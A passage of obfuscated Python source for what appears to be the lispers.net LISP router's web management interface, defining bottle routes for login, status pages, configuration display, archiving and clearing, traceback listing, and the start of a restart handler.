IIIi1i1I = [ { "user-account" : [ { "?" : "not-auth" } ] } ]
return ( json . dumps ( IIIi1i1I ) )
if 51 - 51: O0 + iII111i
if 8 - 8: oO0o * OoOoOO00 - Ii1I - OoO0O00 * OOooOOo % I1IiiI
if 48 - 48: O0
if 11 - 11: I11i + OoooooooOO - OoO0O00 / o0oOOo0O0Ooo + Oo0Ooo . II111iiii
if 41 - 41: Ii1I - O0 - O0
if 68 - 68: OOooOOo % I1Ii111
II = bottle . request . body . readline ( )
if ( II == "" ) :
IIIi1i1I = [ { "?" : [ { "?" : "no-body" } ] } ]
return ( json . dumps ( IIIi1i1I ) )
if 88 - 88: iIii1I11I1II1 - ooOoO0o + OOooOOo
if 40 - 40: I1IiiI * Ii1I + OOooOOo % iII111i
IIIi1i1I = json . loads ( II )
if ( command != "" ) :
command = "lisp " + command
else :
command = IIIi1i1I [ 0 ] . keys ( ) [ 0 ]
if 74 - 74: oO0o - Oo0Ooo + OoooooooOO + I1Ii111 / OoOoOO00
if 23 - 23: O0
if 85 - 85: Ii1I
if 84 - 84: I1IiiI . iIii1I11I1II1 % OoooooooOO + Ii1I % OoooooooOO % OoO0O00
if 42 - 42: OoO0O00 / I11i / o0oOOo0O0Ooo + iII111i / OoOoOO00
if 84 - 84: ooOoO0o * II111iiii + Oo0Ooo
lisp . lisp_ipc_lock . acquire ( )
if ( bottle . request . method == "DELETE" ) :
IIIi1i1I = lispconfig . lisp_remove_clause_for_api ( IIIi1i1I )
else :
IIIi1i1I = lispconfig . lisp_put_clause_for_api ( IIIi1i1I )
if 53 - 53: iII111i % II111iiii . IiII - iIii1I11I1II1 - IiII * II111iiii
lisp . lisp_ipc_lock . release ( )
return ( json . dumps ( IIIi1i1I ) )
if 77 - 77: iIii1I11I1II1 * OoO0O00
if 95 - 95: I1IiiI + i11iIiiIii
if 6 - 6: ooOoO0o / i11iIiiIii + iII111i * oO0o
if 80 - 80: II111iiii
if 83 - 83: I11i . i11iIiiIii + II111iiii . o0oOOo0O0Ooo * I11i
@ bottle . route ( '/lisp/show/api-doc' , method = "get" )
def oooO0 ( ) :
if ( os . path . exists ( "lispapi.py" ) ) : os . system ( "pydoc lispapi > lispapi.txt" )
if ( os . path . exists ( "lispapi.txt" ) == False ) :
return ( "lispapi.txt file not found" )
if 46 - 46: I1Ii111
return ( bottle . static_file ( "lispapi.txt" , root = "./" ) )
if 60 - 60: o0oOOo0O0Ooo
if 25 - 25: OoO0O00
if 62 - 62: OOooOOo + O0
if 98 - 98: o0oOOo0O0Ooo
if 51 - 51: Oo0Ooo - oO0o + II111iiii * Ii1I . I11i + oO0o
@ bottle . route ( '/lisp/show/command-doc' , method = "get" )
def OoO0o ( ) :
return ( bottle . static_file ( "lisp.config.example" , root = "./" ,
mimetype = "text/plain" ) )
if 78 - 78: oO0o % O0 % Ii1I
if 46 - 46: OoooooooOO . i11iIiiIii
if 94 - 94: o0oOOo0O0Ooo * Ii1I / Oo0Ooo / Ii1I
if 87 - 87: Oo0Ooo . IiII
if 75 - 75: ooOoO0o + OoOoOO00 + o0oOOo0O0Ooo * I11i % oO0o . iII111i
if 55 - 55: OOooOOo . I1IiiI
if 61 - 61: Oo0Ooo % IiII . Oo0Ooo
@ bottle . route ( '/lisp/show/lisp-xtr' , method = "get" )
def o0oOO000oO0oo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 77 - 77: Oo0Ooo - i1IIi - I11i . OoOoOO00
if 39 - 39: II111iiii / ooOoO0o + I1Ii111 / OoOoOO00
if 13 - 13: IiII + O0 + iII111i % I1IiiI / o0oOOo0O0Ooo . IiII
if 86 - 86: oO0o * o0oOOo0O0Ooo % i1IIi . Ii1I . i11iIiiIii
if 56 - 56: I1ii11iIi11i % O0 - I1IiiI
if 100 - 100: Ii1I - O0 % oO0o * OOooOOo + I1IiiI
if ( os . path . exists ( "./show-ztr" ) ) :
Oo0O0oooo = open ( "./show-ztr" , "r" ) ; I111iI = Oo0O0oooo . read ( ) ; Oo0O0oooo . close ( )
else :
Oo0O0oooo = open ( "./show-xtr" , "r" ) ; I111iI = Oo0O0oooo . read ( ) ; Oo0O0oooo . close ( )
if 56 - 56: I1IiiI
if 54 - 54: I1Ii111 / OOooOOo . oO0o % iII111i
OoO0OOOOo0O = ""
I111iI = I111iI . split ( "\n" )
for OooOO in I111iI :
if ( OooOO [ 0 : 4 ] == " " ) : OoO0OOOOo0O += lisp . lisp_space ( 4 )
if ( OooOO [ 0 : 2 ] == " " ) : OoO0OOOOo0O += lisp . lisp_space ( 2 )
OoO0OOOOo0O += OooOO + "<br>"
if 21 - 21: I11i / IiII % iIii1I11I1II1 * Oo0Ooo
OoO0OOOOo0O = lisp . convert_font ( OoO0OOOOo0O )
return ( lisp . lisp_print_sans ( OoO0OOOOo0O ) )
if 57 - 57: II111iiii + i1IIi
if 10 - 10: oO0o + i1IIi
if 87 - 87: I1IiiI
if 58 - 58: OoOoOO00 % o0oOOo0O0Ooo
if 50 - 50: I1Ii111 . o0oOOo0O0Ooo
if 97 - 97: O0 + OoOoOO00
if 89 - 89: o0oOOo0O0Ooo + OoO0O00 * I11i * Ii1I
@ bottle . route ( '/lisp/show/<xtr>/keys' , method = "get" )
def iiIiI1i1 ( xtr ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 69 - 69: ooOoO0o
I11iII = lispconfig . lisp_is_user_superuser ( None )
if 5 - 5: I1IiiI
if ( I11iII == False ) :
i1I1ii = "Permission denied"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 48 - 48: o0oOOo0O0Ooo - oO0o / OoooooooOO
if 100 - 100: I1IiiI / o0oOOo0O0Ooo % II111iiii % Oo0Ooo % OOooOOo
if ( xtr not in [ "itr" , "etr" , "rtr" ] ) :
i1I1ii = "Invalid URL"
return ( lispconfig . lisp_show_wrapper ( lisp . lisp_print_cour ( i1I1ii ) ) )
if 98 - 98: I11i % i11iIiiIii % ooOoO0o + Ii1I
OOoOO0o0o0 = "show {}-keys" . format ( xtr )
return ( lispconfig . lisp_process_show_command ( Oo , OOoOO0o0o0 ) )
if 11 - 11: I1IiiI
if 16 - 16: Ii1I + IiII * O0 % i1IIi . I1IiiI
if 67 - 67: OoooooooOO / I1IiiI * Ii1I + I11i
if 65 - 65: OoooooooOO - I1ii11iIi11i / ooOoO0o / II111iiii / i1IIi
if 71 - 71: I1Ii111 + Ii1I
if 28 - 28: OOooOOo
if 38 - 38: ooOoO0o % II111iiii % I11i / OoO0O00 + OoOoOO00 / i1IIi
if 54 - 54: iIii1I11I1II1 % I1ii11iIi11i - OOooOOo / oO0o - OoO0O00 . I11i
@ bottle . route ( '/lisp/geo-map/<geo_prefix>' )
def IIo0Oo0oO0oOO00 ( geo_prefix ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 92 - 92: OoooooooOO * I1Ii111
if 100 - 100: I1Ii111 + I1Ii111 * IiII
geo_prefix = geo_prefix . split ( "-" )
geo_prefix = "-" . join ( geo_prefix [ 0 : - 1 ] ) + "/" + geo_prefix [ - 1 ]
I1i = lisp . lisp_geo ( "" )
I1i . parse_geo_string ( geo_prefix )
O00Oooo , i11I = I1i . dms_to_decimal ( )
o00Oo0oooooo = I1i . radius * 1000
if 76 - 76: I11i / OOooOOo . O0 % I1IiiI . o0oOOo0O0Ooo + IiII
o0o = open ( "./lispers.net-geo.html" , "r" ) ; oo0 = o0o . read ( ) ; o0o . close ( )
oo0 = oo0 . replace ( "$LAT" , str ( O00Oooo ) )
oo0 = oo0 . replace ( "$LON" , str ( i11I ) )
oo0 = oo0 . replace ( "$RADIUS" , str ( o00Oo0oooooo ) )
return ( oo0 )
if 61 - 61: OoOoOO00 - OOooOOo - i1IIi
if 25 - 25: O0 * I11i + I1ii11iIi11i . o0oOOo0O0Ooo . o0oOOo0O0Ooo
if 58 - 58: I1IiiI
if 53 - 53: i1IIi
if 59 - 59: o0oOOo0O0Ooo
if 81 - 81: OoOoOO00 - OoOoOO00 . iII111i
if 73 - 73: I11i % i11iIiiIii - I1IiiI
@ bottle . route ( '/lisp/login' , method = "get" )
def oOO00O ( ) :
return ( lispconfig . lisp_login_page ( ) )
if 7 - 7: O0 * i11iIiiIii * Ii1I + ooOoO0o % OoO0O00 - ooOoO0o
if 39 - 39: Oo0Ooo * OOooOOo % OOooOOo - OoooooooOO + o0oOOo0O0Ooo - I11i
if 23 - 23: i11iIiiIii
if 30 - 30: o0oOOo0O0Ooo - i1IIi % II111iiii + I11i * iIii1I11I1II1
if 81 - 81: IiII % i1IIi . iIii1I11I1II1
if 4 - 4: i11iIiiIii % OoO0O00 % i1IIi / IiII
if 6 - 6: iII111i / I1IiiI % OOooOOo - I1IiiI
if 31 - 31: OOooOOo
@ bottle . route ( '/lisp/login' , method = "post" )
def i1 ( ) :
if ( lispconfig . lisp_validate_user ( ) ) :
return ( lispconfig . lisp_landing_page ( ) )
if 88 - 88: OoO0O00 - ooOoO0o + OOooOOo * I1IiiI % iIii1I11I1II1 + Oo0Ooo
return ( oOO00O ( ) )
if 76 - 76: I1IiiI * iII111i % I1Ii111
if 57 - 57: iIii1I11I1II1 - i1IIi / I1Ii111 - O0 * OoooooooOO % II111iiii
if 68 - 68: OoooooooOO * I11i % OoOoOO00 - IiII
if 34 - 34: I1Ii111 . iIii1I11I1II1 * OoOoOO00 * oO0o / I1Ii111 / I1ii11iIi11i
if 78 - 78: Oo0Ooo - o0oOOo0O0Ooo / OoOoOO00
if 10 - 10: iII111i + Oo0Ooo * I1ii11iIi11i + iIii1I11I1II1 / I1Ii111 / I1ii11iIi11i
if 42 - 42: I1IiiI
@ bottle . route ( '/lisp' )
def II1i11I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 50 - 50: OoooooooOO % I11i
return ( lispconfig . lisp_landing_page ( ) )
if 49 - 49: oO0o - i11iIiiIii . I1Ii111 * Ii1I % iII111i + i1IIi
if 71 - 71: o0oOOo0O0Ooo
if 38 - 38: oO0o % OoOoOO00 + I1ii11iIi11i . i11iIiiIii
if 53 - 53: i11iIiiIii * iII111i
if 68 - 68: iIii1I11I1II1 * iIii1I11I1II1 . o0oOOo0O0Ooo / II111iiii % Oo0Ooo
if 38 - 38: ooOoO0o - OOooOOo / iII111i
if 66 - 66: O0 % I1ii11iIi11i + i11iIiiIii . OoOoOO00 / Ii1I + I1ii11iIi11i
@ bottle . route ( '/lisp/traceback' )
def ooo00Ooo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 93 - 93: i11iIiiIii - I1IiiI * I1ii11iIi11i * I11i % O0 + OoooooooOO
if 25 - 25: IiII + Ii1I / ooOoO0o . o0oOOo0O0Ooo % O0 * OoO0O00
o0O0oo0OO0O = True
if 68 - 68: oO0o . I11i % OoooooooOO . I11i
if 64 - 64: iIii1I11I1II1 / I1IiiI . II111iiii + OoooooooOO . OoO0O00
if 56 - 56: Oo0Ooo . I1ii11iIi11i . I1IiiI
if 39 - 39: O0 + I1Ii111
if ( os . path . exists ( "./logs/lisp-traceback.log" ) ) :
i1I1ii = commands . getoutput ( "cat ./logs/lisp-traceback.log" )
if ( i1I1ii ) :
i1I1ii = i1I1ii . replace ( "----------" , "<b>----------</b>" )
i1I1ii = i1I1ii . replace ( "\n" , "<br>" )
o0O0oo0OO0O = False
if 91 - 91: OoooooooOO - iIii1I11I1II1 + OoOoOO00 / OoO0O00 . OoOoOO00 + O0
if 26 - 26: I1ii11iIi11i - OoooooooOO
if 11 - 11: I1IiiI * oO0o
if 81 - 81: iII111i + IiII
if 98 - 98: I1IiiI
if 95 - 95: ooOoO0o / ooOoO0o
if ( o0O0oo0OO0O ) :
i1I1ii = ""
IIiI1Ii = "egrep --with-filename Traceback ./logs/*.log"
O0O0O0Oo = commands . getoutput ( IIiI1Ii )
O0O0O0Oo = O0O0O0Oo . split ( "\n" )
for OOOOoO00o0O in O0O0O0Oo :
if ( OOOOoO00o0O . find ( ":" ) == - 1 ) : continue
OooOO = OOOOoO00o0O . split ( ":" )
if ( OooOO [ 1 ] == "0" ) : continue
i1I1ii += "Found Tracebacks in log file {}<br>" . format ( OooOO [ 0 ] )
o0O0oo0OO0O = False
if 41 - 41: OOooOOo * Ii1I - IiII + o0oOOo0O0Ooo
i1I1ii = i1I1ii [ 0 : - 4 ]
if 64 - 64: Ii1I
if 66 - 66: i11iIiiIii - OOooOOo * Oo0Ooo
if ( o0O0oo0OO0O ) :
i1I1ii = "No Tracebacks found - a stable system is a happy system"
if 76 - 76: i11iIiiIii + o0oOOo0O0Ooo / I1ii11iIi11i - OoO0O00 - Ii1I + I1ii11iIi11i
if 51 - 51: iIii1I11I1II1 . ooOoO0o + iIii1I11I1II1
i1I1ii = lisp . lisp_print_cour ( i1I1ii )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 95 - 95: I1IiiI
if 46 - 46: OoOoOO00 + OoO0O00
if 70 - 70: iII111i / iIii1I11I1II1
if 85 - 85: OoooooooOO % i1IIi * OoooooooOO / I1ii11iIi11i
if 96 - 96: OoooooooOO + oO0o
if 44 - 44: oO0o
if 20 - 20: I11i + Ii1I / O0 % iIii1I11I1II1
@ bottle . route ( '/lisp/show/not-supported' )
def oOo0O ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 64 - 64: I1ii11iIi11i - iII111i + iII111i - I11i
return ( lispconfig . lisp_not_supported ( ) )
if 30 - 30: iIii1I11I1II1 . I1IiiI . OOooOOo / o0oOOo0O0Ooo
if 42 - 42: Oo0Ooo
if 19 - 19: oO0o % I1ii11iIi11i * iIii1I11I1II1 + I1IiiI
if 46 - 46: Oo0Ooo
if 1 - 1: iII111i
if 97 - 97: OOooOOo + iII111i + O0 + i11iIiiIii
if 77 - 77: o0oOOo0O0Ooo / OoooooooOO
@ bottle . route ( '/lisp/show/status' )
def IIii11I1i1I ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 99 - 99: iII111i
if 76 - 76: OoO0O00 * I1IiiI
if 82 - 82: Ii1I * iII111i / I1ii11iIi11i
if 36 - 36: OoooooooOO - i1IIi . O0 / II111iiii + o0oOOo0O0Ooo
if 33 - 33: II111iiii / ooOoO0o * O0 % Ii1I * I1Ii111
i1I1ii = ""
I11iII = lispconfig . lisp_is_user_superuser ( None )
if ( I11iII ) :
O0o = lisp . lisp_button ( "show configuration" , "/lisp/show/conf" )
O0OOoOOO0oO = lisp . lisp_button ( "show configuration diff" , "/lisp/show/diff" )
I1ii11 = lisp . lisp_button ( "archive configuration" , "/lisp/archive/conf" )
oOoOoOoo0 = lisp . lisp_button ( "clear configuration" , "/lisp/clear/conf/verify" )
OOOOoO00o0O = lisp . lisp_button ( "log flows" , "/lisp/log/flows" )
III1ii1I = lisp . lisp_button ( "install LISP software" , "/lisp/install/image" )
Ii1i1iI = lisp . lisp_button ( "restart LISP subsystem" , "/lisp/restart/verify" )
if 16 - 16: OOooOOo / Oo0Ooo / OoooooooOO * I1IiiI + i1IIi % OOooOOo
i1I1ii = "<center>{}{}{}{}{}{}{}</center><hr>" . format ( O0o , O0OOoOOO0oO , I1ii11 , oOoOoOoo0 ,
OOOOoO00o0O , III1ii1I , Ii1i1iI )
if 71 - 71: OoOoOO00
if 14 - 14: i11iIiiIii % OOooOOo
OooO0oo = commands . getoutput ( "uptime" )
o0o0oOoOO0O = commands . getoutput ( "uname -pv" )
i1ii1II1ii = lisp . lisp_version . replace ( "+" , "" )
if 28 - 28: I1ii11iIi11i
if 61 - 61: OOooOOo % OOooOOo * o0oOOo0O0Ooo / o0oOOo0O0Ooo
if 75 - 75: IiII . ooOoO0o
if 50 - 50: OoOoOO00
if 60 - 60: ooOoO0o * iIii1I11I1II1 * I1ii11iIi11i * Oo0Ooo
O0ooooo0OOOO0 = multiprocessing . cpu_count ( )
if 9 - 9: II111iiii - o0oOOo0O0Ooo / iII111i / o0oOOo0O0Ooo
I1i111iiIIIi = OooO0oo . find ( ", load" )
OooO0oo = OooO0oo [ 0 : I1i111iiIIIi ]
O00 = lisp . lisp_print_elapsed ( lisp . lisp_uptime )
if 17 - 17: Ii1I - OoooooooOO % Ii1I . IiII / i11iIiiIii % iII111i
iIiIIIIIii = "Not available"
if 58 - 58: o0oOOo0O0Ooo / IiII . OoOoOO00 / OoooooooOO + I1Ii111
if 86 - 86: I11i * I1IiiI + I11i + II111iiii
if 8 - 8: I1Ii111 - iII111i / ooOoO0o
if 96 - 96: OoOoOO00
OOoOO0o0o0 = "ps auww" if lisp . lisp_is_macos ( ) else "ps aux"
IIiiI = commands . getoutput ( "{} | egrep 'PID|python lisp|python -O lisp' | egrep -v grep" . format ( OOoOO0o0o0 ) )
if 31 - 31: I1ii11iIi11i + Ii1I + I1Ii111 / Ii1I
if 25 - 25: OoO0O00
IIiiI = IIiiI . replace ( " " , lisp . space ( 1 ) )
IIiiI = IIiiI . replace ( "\n" , "<br>" )
if 24 - 24: IiII * i11iIiiIii * OOooOOo
if 85 - 85: o0oOOo0O0Ooo . OoOoOO00 / ooOoO0o . O0 % I1Ii111
if 90 - 90: Oo0Ooo % O0 * iIii1I11I1II1 . iII111i
if 8 - 8: ooOoO0o + II111iiii / iII111i / I11i
if ( o0o0oOoOO0O . find ( "Darwin" ) != - 1 ) :
O0ooooo0OOOO0 = O0ooooo0OOOO0 / 2
iIiIIIIIii = commands . getoutput ( "top -l 1 | head -50" )
iIiIIIIIii = iIiIIIIIii . split ( "PID" )
iIiIIIIIii = iIiIIIIIii [ 0 ]
if 74 - 74: O0 / i1IIi
if 78 - 78: OoooooooOO . OoO0O00 + ooOoO0o - i1IIi
if 31 - 31: OoooooooOO . OOooOOo
if 83 - 83: iII111i . O0 / Oo0Ooo / OOooOOo - II111iiii
if 100 - 100: OoO0O00
I1i111iiIIIi = iIiIIIIIii . find ( "Load Avg" )
II1i = iIiIIIIIii [ 0 : I1i111iiIIIi ] . find ( "threads" )
Ii1IIIIi1ii1I = iIiIIIIIii [ 0 : II1i + 7 ]
iIiIIIIIii = Ii1IIIIi1ii1I + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "CPU usage" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "SharedLibs:" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "MemRegions" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "PhysMem" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "VM:" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "Networks" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
I1i111iiIIIi = iIiIIIIIii . find ( "Disks" )
iIiIIIIIii = iIiIIIIIii [ 0 : I1i111iiIIIi ] + "<br>" + iIiIIIIIii [ I1i111iiIIIi : : ]
else :
if 13 - 13: I1IiiI % OoOoOO00 . I1ii11iIi11i / Oo0Ooo % OOooOOo . OoooooooOO
if 22 - 22: IiII / i11iIiiIii
if 62 - 62: OoO0O00 / I1ii11iIi11i
if 7 - 7: OoooooooOO . IiII
I111iI = commands . getoutput ( "top -b -n 1 | head -50" )
I111iI = I111iI . split ( "PID" )
I111iI [ 1 ] = I111iI [ 1 ] . replace ( " " , lisp . space ( 1 ) )
I111iI = I111iI [ 0 ] + I111iI [ 1 ]
iIiIIIIIii = I111iI . replace ( "\n" , "<br>" )
if 53 - 53: Ii1I % Ii1I * o0oOOo0O0Ooo + OoOoOO00
if 92 - 92: OoooooooOO + i1IIi / Ii1I * O0
O00oOo00o0o = commands . getoutput ( "cat release-notes.txt" )
O00oOo00o0o = O00oOo00o0o . replace ( "\n" , "<br>" )
if 85 - 85: iII111i + OoooooooOO * iII111i - I1Ii111 % i11iIiiIii
i1I1ii += '''
<br><table align="center" border="1" cellspacing="3x" cellpadding="5x">
<tr>
<td width="20%"><i>LISP Subsystem Version:<br>
LISP Release {} Build Date:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>LISP Subsystem Uptime:<br>System Uptime:</i></td>
<td width="80%"><font face="Courier New">{}<br>
{}</font></td>
</tr>
<tr>
<td width="20%"><i>System Architecture:<br>
Number of CPUs:<font face="Courier New">{}{}</font></td>
<td width="80%"><font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>LISP Process Status:</i></td>
<td width="80%">
<div style="height: 100px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
<tr>
<td width="20%" valign="top"><i>System Resource Utilization:</i></td>
<td width="80%">
<div style="height: 200px; overflow: auto">
<font face="Courier New">{}</font></td>
</tr>
<tr>
<td width="20%" valign="top"><i>Release Notes:</i></td>
<td width="80%">
<div style="height: 300px; overflow: auto">
<font size="2" face="Courier New">{}</font></div></td>
</tr>
</table>
''' . format ( i1ii1II1ii , lisp . lisp_version , Oo0o , O00 ,
OooO0oo , lisp . lisp_space ( 1 ) , O0ooooo0OOOO0 , o0o0oOoOO0O , IIiiI , iIiIIIIIii ,
O00oOo00o0o )
if 71 - 71: I1ii11iIi11i - ooOoO0o / OoOoOO00 * OoOoOO00 / i1IIi . i1IIi
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 53 - 53: I1Ii111
if 21 - 21: I11i
if 92 - 92: i11iIiiIii / I1Ii111 - iII111i % ooOoO0o * I1Ii111 + Oo0Ooo
if 11 - 11: OoooooooOO . I1Ii111
if 80 - 80: OoooooooOO - OOooOOo * Ii1I * I1ii11iIi11i / I1IiiI / OOooOOo
if 13 - 13: I1Ii111 * ooOoO0o + i11iIiiIii * I1Ii111 - ooOoO0o
if 23 - 23: iIii1I11I1II1 * i1IIi % OoooooooOO * IiII
@ bottle . route ( '/lisp/show/conf' )
def I1Iiiiiii ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 39 - 39: IiII * Oo0Ooo + iIii1I11I1II1 - IiII + OOooOOo
return ( bottle . static_file ( "lisp.config" , root = "./" , mimetype = "text/plain" ) )
if 69 - 69: O0
if 85 - 85: ooOoO0o / O0
if 18 - 18: o0oOOo0O0Ooo % O0 * I1ii11iIi11i
if 62 - 62: I1Ii111 . IiII . OoooooooOO
if 11 - 11: OOooOOo / I11i
if 73 - 73: i1IIi / i11iIiiIii
if 58 - 58: Oo0Ooo . II111iiii + oO0o - i11iIiiIii / II111iiii / O0
@ bottle . route ( '/lisp/show/diff' )
def oOOoOo ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 89 - 89: II111iiii + i1IIi + II111iiii
return ( bottle . static_file ( "lisp.config.diff" , root = "./" ,
mimetype = "text/plain" ) )
if 7 - 7: O0 % o0oOOo0O0Ooo + I1ii11iIi11i * iII111i - iII111i
if 42 - 42: OoOoOO00 * OoOoOO00 * I1Ii111 . I11i
if 51 - 51: OOooOOo % iIii1I11I1II1 - OoooooooOO % ooOoO0o * iIii1I11I1II1 % OoO0O00
if 99 - 99: oO0o * II111iiii * I1Ii111
if 92 - 92: Oo0Ooo
if 40 - 40: OoOoOO00 / IiII
if 79 - 79: OoO0O00 - iIii1I11I1II1 + Ii1I - I1Ii111
@ bottle . route ( '/lisp/archive/conf' )
def OoO ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 35 - 35: OoOoOO00 + i11iIiiIii - II111iiii
if 15 - 15: i11iIiiIii % I1IiiI * I11i / I1Ii111
lisp . lisp_ipc_lock . acquire ( )
os . system ( "cp ./lisp.config ./lisp.config.archive" )
lisp . lisp_ipc_lock . release ( )
if 90 - 90: iII111i
i1I1ii = "Configuration file saved to "
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
i1I1ii += lisp . lisp_print_cour ( "./lisp.config.archive" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 31 - 31: OOooOOo + O0
if 87 - 87: ooOoO0o
if 45 - 45: OoO0O00 / OoooooooOO - iII111i / Ii1I % IiII
if 83 - 83: I1IiiI . iIii1I11I1II1 - IiII * i11iIiiIii
if 20 - 20: i1IIi * I1Ii111 + II111iiii % o0oOOo0O0Ooo % oO0o
if 13 - 13: Oo0Ooo
if 60 - 60: I1ii11iIi11i * I1IiiI
@ bottle . route ( '/lisp/clear/conf' )
def I1iIiI11I1 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 27 - 27: Ii1I . i11iIiiIii % I1Ii111
if 65 - 65: II111iiii . I1IiiI % oO0o * OoO0O00
os . system ( "cp ./lisp.config ./lisp.config.before-clear" )
lisp . lisp_ipc_lock . acquire ( )
iI11I ( )
lisp . lisp_ipc_lock . release ( )
if 11 - 11: iII111i - oO0o + II111iiii - iIii1I11I1II1
i1I1ii = "Configuration cleared, a backup copy is stored in "
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
i1I1ii += lisp . lisp_print_cour ( "./lisp.config.before-clear" )
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 7 - 7: IiII - I11i / II111iiii * Ii1I . iII111i * iII111i
if 61 - 61: I11i % ooOoO0o - OoO0O00 / Oo0Ooo
if 4 - 4: OoooooooOO - i1IIi % Ii1I - OOooOOo * o0oOOo0O0Ooo
if 85 - 85: OoooooooOO * iIii1I11I1II1 . iII111i / OoooooooOO % I1IiiI % O0
if 36 - 36: Ii1I / II111iiii / IiII / IiII + I1ii11iIi11i
if 95 - 95: IiII
if 51 - 51: II111iiii + IiII . i1IIi . I1ii11iIi11i + OoOoOO00 * I1IiiI
@ bottle . route ( '/lisp/clear/conf/verify' )
def OOoOoo0 ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 17 - 17: Ii1I + oO0o . OoO0O00 - Oo0Ooo * i11iIiiIii
if 20 - 20: I1IiiI . OoooooooOO % OOooOOo
i1I1ii = "<br>Are you sure you want to clear the configuration?"
i1I1ii = lisp . lisp_print_sans ( i1I1ii )
if 63 - 63: I1IiiI % iIii1I11I1II1
I1ii = lisp . lisp_button ( "yes" , "/lisp/clear/conf" )
O00O0O = lisp . lisp_button ( "cancel" , "/lisp" )
i1I1ii += I1ii + O00O0O + "<br>"
return ( lispconfig . lisp_show_wrapper ( i1I1ii ) )
if 19 - 19: OoO0O00 * I11i / I11i . OoooooooOO - OOooOOo + i11iIiiIii
if 88 - 88: i11iIiiIii - ooOoO0o
if 67 - 67: OOooOOo . Oo0Ooo + OoOoOO00 - OoooooooOO
if 70 - 70: OOooOOo / II111iiii - iIii1I11I1II1 - iII111i
if 11 - 11: iIii1I11I1II1 . OoooooooOO . II111iiii / i1IIi - I11i
if 30 - 30: OoOoOO00
if 21 - 21: i11iIiiIii / I1Ii111 % OOooOOo * O0 . I11i - iIii1I11I1II1
if 26 - 26: II111iiii * OoOoOO00
if 10 - 10: II111iiii . iII111i
def I1iOOOO ( ) :
oOoO0o00OO0 = ""
if 88 - 88: iII111i
for iiI11I1i1i1iI in [ "443" , "-8080" , "8080" ] :
OoOOo000o0 = 'ps auxww | egrep "lisp-core.pyo {}" | egrep -v grep' . format ( iiI11I1i1i1iI )
i1I1ii = commands . getoutput ( OoOOo000o0 )
if ( i1I1ii == "" ) : continue
if 12 - 12: II111iiii . I11i / OOooOOo
i1I1ii = i1I1ii . split ( "\n" ) [ 0 ]
i1I1ii = i1I1ii . split ( " " )
if ( i1I1ii [ - 2 ] == "lisp-core.pyo" and i1I1ii [ - 1 ] == iiI11I1i1i1iI ) : oOoO0o00OO0 = iiI11I1i1i1iI
break
if 77 - 77: ooOoO0o - I1IiiI % I11i - O0
return ( oOoO0o00OO0 )
if 67 - 67: OOooOOo + Oo0Ooo
if 84 - 84: O0 * OoooooooOO - IiII * IiII
if 8 - 8: ooOoO0o / i1IIi . oO0o
if 41 - 41: iII111i + OoO0O00
if 86 - 86: OoOoOO00 . iIii1I11I1II1 - OoO0O00
if 56 - 56: O0
if 61 - 61: o0oOOo0O0Ooo / OOooOOo / Oo0Ooo * O0
@ bottle . route ( '/lisp/restart' )
def iIII1i1i ( ) :
if ( lispconfig . lisp_validate_user ( ) == False ) :
return ( oOO00O ( ) )
if 35 - 35: II111iiii * I11i - OoooooooOO . I11i . I11i
if 11 - 11: I1Ii111 / OoOoOO00 + I11i % iIii1I11I1II1
if 42 - 42: I1ii11iIi11i * OoOoOO00 % ooOoO0o - OoOoOO00 . i11iIiiIii - I1Ii111
if 84 - 84: I1Ii111 - I1ii11iIi11i / I11i
if 13 - 13: IiII - Oo0Ooo - ooOoO0o
if 92 - 92: ooOoO0o / OoOoOO00 * OoO0O00 . I11i % II111iiii
OooOO = commands . getoutput ( "egrep requiretty /etc/sudoers" ) . split ( " " )
